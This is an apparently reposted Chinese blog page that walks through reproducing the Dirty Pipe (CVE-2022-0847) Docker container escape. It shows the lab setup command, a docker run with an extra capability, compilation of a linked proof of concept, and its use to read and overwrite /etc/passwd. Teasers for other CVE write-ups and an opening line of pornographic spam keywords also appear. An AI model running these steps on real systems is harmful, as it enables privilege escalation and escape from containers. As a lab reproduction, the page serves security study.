国产无码综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

Docker Dirtypipe（CVE-2022-0847）漏洞復現(xiàn)與分析容器逃逸

2年前作者：信安成長日記分類：Toy博客閱讀(37)違法舉報

這篇具有很好參考價值的文章主要介紹了Docker Dirtypipe（CVE-2022-0847）漏洞復現(xiàn)與分析容器逃逸。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方，請大家不吝賜教，您也可以點擊"舉報違法"按鈕提交疑問。

安裝環(huán)境

./metarget cnv install cve-2022-0847 --verbose

原理

同臟牛，通過寫只讀內存，對映射的內存做篡改

EXP


docker run --rm -it -v $(pwd):/exp --cap-add=CAP_DAC_READ_SEARCH ubuntu

如果提示 Unknown capability to add: "CAP_CAP_DAC_READ_SEARCH"錯誤則運行下列命令

docker run --rm -it -v $(pwd):/exp --cap-add=DAC_READ_SEARCH ubuntu

gcc dp.c -o dp

讀系統(tǒng)文件：/exp/dp /etc/passwd

寫系統(tǒng)文件 /exp/dp /etc/passwd 1 ootz:

GitHub - greenhandatsjtu/CVE-2022-0847-Container-Escape: CVE-2022-0847 used to achieve container escape 利用CVE-2022-0847 (Dirty Pipe) 實現(xiàn)容器逃逸

參考

云原生之容器安全實踐-安全客 - 安全資訊平臺 (anquanke.com)

從臟管道(CVE-2022-0847)到docker逃逸 - 先知社區(qū) (aliyun.com)文章來源地址http://www.zghlxwxcb.cn/news/detail-641247.html

到了這里，關于Docker Dirtypipe（CVE-2022-0847）漏洞復現(xiàn)與分析容器逃逸的文章就介紹完了。如果您還想了解更多內容，請在右上角搜索TOY模板網以前的文章或繼續(xù)瀏覽下面的相關文章，希望大家以后多多支持TOY模板網！

本文來自互聯(lián)網用戶投稿，該文觀點僅代表作者本人，不代表本站立場。本站僅提供信息存儲空間服務，不擁有所有權，不承擔相關法律責任。如若轉載，請注明出處：如若內容造成侵權/違法違規(guī)/事實不符，請點擊違法舉報進行投訴反饋，一經查實，立即刪除！

分享到：

領支付寶紅包贊助服務器費用

CVE-2022-30887漏洞復現(xiàn)
多語言藥房管理系統(tǒng) (MPMS) 是用 PHP 和 MySQL 開發(fā)的, 該軟件的主要目的是在藥房和客戶之間提供一套接口，客戶是該軟件的主要用戶。該軟件有助于為藥房業(yè)務創(chuàng)建一個綜合數據庫，并根據到期、產品等各種參數提供各種報告。該CMS中php_action/editProductImage.php存在任意文件上傳
2023年04月08日
瀏覽(50)
CVE漏洞復現(xiàn)-CVE-2022-22965-Spring-RCE漏洞
Spring framework 是Spring 里面的一個基礎開源框架，其目的是用于簡化 Java 企業(yè)級應用的開發(fā)難度和開發(fā)周期,2022年3月31日，VMware Tanzu發(fā)布漏洞報告，Spring Framework存在遠程代碼執(zhí)行漏洞，在 JDK 9+ 上運行的 Spring MVC 或 Spring WebFlux 應用程序可能容易受到通過數據綁定的遠程代碼執(zhí)行
2023年04月21日
瀏覽(26)
漏洞復現(xiàn) | Apache Shiro 授權繞過漏洞（CVE-2022-32532）
0x00 漏洞描述 ????????Apache Shiro 是一套用于執(zhí)行認證、授權、加密和會話管理的 Java 安全框架。2022年06月29日 APache 官方發(fā)布了一則關于 Apache Shiro 的安全通告，Apache Shiro 1.9.1 前的版本 RegExPatternMatcher 在使用帶有 “.” 的正則時，可能會導致權限繞過。漏洞源于 RegExPatter
2024年02月02日
瀏覽(36)
Cacti命令執(zhí)行漏洞復現(xiàn)(CVE-2022-46169)
Cacti項目是一個開源平臺，可為用戶提供強大且可擴展的操作監(jiān)控和故障管理框架。在1.2.22版本中存在一處命令注入漏洞，攻擊者可以通過X-Forwarded-For請求頭繞過服務端校驗并在其中執(zhí)行任意命令。漏洞編號：CVE-2022-46169，漏洞等級：嚴重。影響版本 Cacti == 1.2.22 不受影響版本
2024年02月02日
瀏覽(21)
Nftables棧溢出漏洞(CVE-2022-1015)復現(xiàn)
背景介紹 Nftables 是一個基于內核的包過濾框架，用于 Linux操作系統(tǒng)中的網絡安全和防火墻功能。nftables的設計目標是提供一種更簡單、更靈活和更高效的方式來管理網絡數據包的流量。鉤子點的作用是攔截數據包，然后對數據包進行修改，比較，丟棄和放行等操作。 Nftable
2024年02月12日
瀏覽(21)
CVE-2022-33891漏洞原理、環(huán)境搭建和復現(xiàn)
最近有幸參與了某地市的攻防演練，在掃描器漏洞都被提交了之后，大殺器也逐漸開始浮出水面，其中就包含今天的主角：apache spark的rce。 Apache Spark 是專為大規(guī)模數據處理而設計的快速通用的計算引擎。與 Hadoop 不同，Spark 和 Scala 能夠緊密集成，其中的 Scala 可以像操作本地
2024年02月13日
瀏覽(19)
CVE -2022-26134漏洞復現(xiàn)(Confluence OGNL 注入rce漏洞)
0x01 Atlassian Confluence Atlassian Confluence是一個專業(yè)的企業(yè)知識管理與協(xié)同軟件，主要用于公司內員工創(chuàng)建知識庫并建立知識管理流程，也可以用于構建企業(yè)wiki。其使用簡單，但它強大的編輯和站點管理特征能夠幫助團隊成員之間共享信息、文檔協(xié)作、集體討論，信息推送。因此
2024年02月16日
瀏覽(19)
Django SQL注入漏洞復現(xiàn) （CVE-2022-28347）
? 在Django 2.2 的 2.2.28 之前版本、3.2 的 3.2.13 之前版本和 4.0 的 4.0.4 之前版本中的 QuerySet.deexplain() 中發(fā)現(xiàn)了SQL注入問題。這是通過傳遞一個精心編制的字典（帶有字典擴展）作為**options參數來實現(xiàn)的，并將注入負載放置在選項名稱中。 2.2 = Django 2.2.28 3.2 = Django 3.2.13 4.0 = Djan
2024年02月05日
瀏覽(23)
CVE漏洞復現(xiàn)-CVE-2022-22947-Spring Cloud Gateway RCE
微服務架構與Spring Cloud 最開始時，我們開發(fā)java項目時，所有的代碼都在一個工程里，我們把它稱為單體架構。當我們的項目的代碼量越來越大時，開發(fā)的成員越來越多時，這時我們項目的性能以及我們開發(fā)的效率都會存在非常大的問題，所以對于這樣的項目，我們需要把它
2023年04月14日
瀏覽(26)
Microsoft Office MSDT代碼執(zhí)行漏洞（CVE-2022-30190）漏洞復現(xiàn)
本文章僅供學習和研究使用，嚴禁使用該文章內容對互聯(lián)網其他應用進行非法操作，若將其用于非法目的，所造成的后果由您自行承擔，產生的一切風險與本文作者無關，如繼續(xù)閱讀該文章即表明您默認遵守該內容。該漏洞首次發(fā)現(xiàn)在2022 年 5 月 27 日，由白俄羅斯的一個 I
2024年02月06日
瀏覽(29)